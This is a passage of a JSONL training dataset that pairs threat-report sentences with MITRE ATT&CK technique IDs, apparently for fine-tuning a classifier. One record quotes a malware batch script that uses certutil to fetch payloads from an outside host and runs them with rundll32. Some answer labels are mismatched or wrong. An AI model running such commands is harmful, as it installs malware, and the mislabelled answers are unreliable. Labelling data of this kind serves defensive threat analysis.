Esentutl.exe is able to use the Volume Shadow Copy service to make a backup of a locked file" }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bonadan can XOR-encrypt C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These parameters install it as a service" }, { "role": "assistant", "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The FTP account information used in the malware can expose the C&C server to attacks. The string ‘victory’ used in the password has also been found in the b374k webshell used by the Kimsuky group" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used credential dumping tools such as and Lazagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identify configuration settings, exfiltrate data, and to execute other commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can monitor services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes using regsvr32.exe called from the persistence mechanism." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003" }, { "role": "assistant", "content": "T1133 - External Remote Services', 'T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can capture screenshots of the victim’s machine." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds." }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWizard has used `regsvr32.exe /s /i` to execute malicious payloads." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to download a DLL from C2 to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec has a plugin to detect active drivers of some security products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads and executes additional malware from either a Web address or a Microsoft OneDrive account." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This cabinet file is then extracted to the previously identified file path. Again, a shortcut file is written to the %TEMP% path with a name of ‘~Update.lnk’, which is in turn copied to the identified startup path with a filename of ‘Windows help.lnk’. This shortcut file calls the built-in ‘control.exe’ utility to in turn load the previously dropped malicious CPL file of ‘winhelp.cpl’. Finally, the malware calls the ‘winhelp.cpl’ file in a new process via the following command" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The encryption/decryption routine (refer to Figure 5) can be summarized as follows: Figure 5: Encryption/ Decryption Function Generate an array of integers from 0x00 to 0xff Scrambles the state of the table using the given key Encrypts or decrypts a string using the scrambled table from (b)" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes systeminfo after initial communication is made to the remote server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aoqin Dragon has used the Themida packer to obfuscate malicious payloads." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can take a desktop screenshot and save the file into \"\\ProgramData\\Mail\\MailAg\\shot.png\"." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a tool that can obtain info about local and global group users, power users, and administrators." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can save encryption parameters and system information to the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 created and modified startup files for persistence. APT41 added a registry key in \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" to establish persistence for Cobalt Strike." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this particular instance, the following script is retrieved:@echo off :if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del /f /q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del /f /q setup2.txt > nul :GOTO ISEXIST :ISEXIST if exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT) :EXECUTE ver | findstr /i \"10\\.\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS) :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT :OTHEROS wusa %TEMP%\\setup.cab /quiet /extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT :EXIT del /f /q setup.cab > nul del /f /q %~dpnx0 > nulThis script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can store its configuration in the Registry at \"HKCU\\Software\\\" under frequently changing names including \"%USERNAME%\" and \"ToolTech-RM\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUNCHBUGGY can load a DLL using Rundll32." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to access the webcam on the victim’s machine." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "tries to add a scheduled task to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group used Ruler to configure a specially crafted Outlook Home Page URL to exploit the security bypass vulnerability CVE-2017-11774, which was fixed shortly after it was discovered. Successful exploitation automatically triggered remote code execution of a script when an Outlook client synced with a mailbox and rendered the profile Home Page URL. These scripts, usually VBScript followed by PowerShell, in turn initiated the delivery of various payloads" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32's backdoor possesses the capability to list files and directories on a machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can run Mimikatz to harvest credentials." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We found a mechanism for decrypting, executing, and downloading an additional payload from the C&C server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dyre has the ability to create files in a TEMP folder to act as a database to store information." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data." }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels" }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious Kitten has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones." }, { "role": "assistant", "content": "T1036.002 - Right-to-Left Override" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response" }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PyDCrypt will remove all created artifacts such as dropped executables." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "typically use ping and to enumerate systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has added accounts to specific groups with \"net localgroup\"." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use \"GetProcAddress\" to help delete malicious strings from memory." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has created scheduled tasks to run malicious scripts on a compromised host." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the malware." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to get directory listings or drive information on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses cmd.exe to execute commands for discovery." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods \"target_integrator.rb\" files under the \"/Library/Ruby/Gems\" folder or enumerates all \".xcodeproj\" folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder." }, { "role": "assistant", "content": "T1195.001 - Compromise Software Dependencies and Development Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If opened, the dropper runs a loader known as Trojan.Vcrodat on the computer. Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor’s component may be run with elevated privileges" }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command" }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may use net group \"domain admins\" /domain to display accounts in the \"domain admins\" permissions group and net localgroup \"administrators\" to list local system administrator group membership." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used UPX to pack files." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 14: System shut down upon discovery of security tools Ability to receive PowerShell script from the C2 server and execute on the machine" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The “VPN Client” is a legitimate Juniper VPN software bundled with Helminth,  a malware in use by the OilRig threat agnet: JuniperSetupClientInstaller.exe 6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link) If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The tool was primarily used by the attackers to move laterally on the victim’s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations" }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access." }, 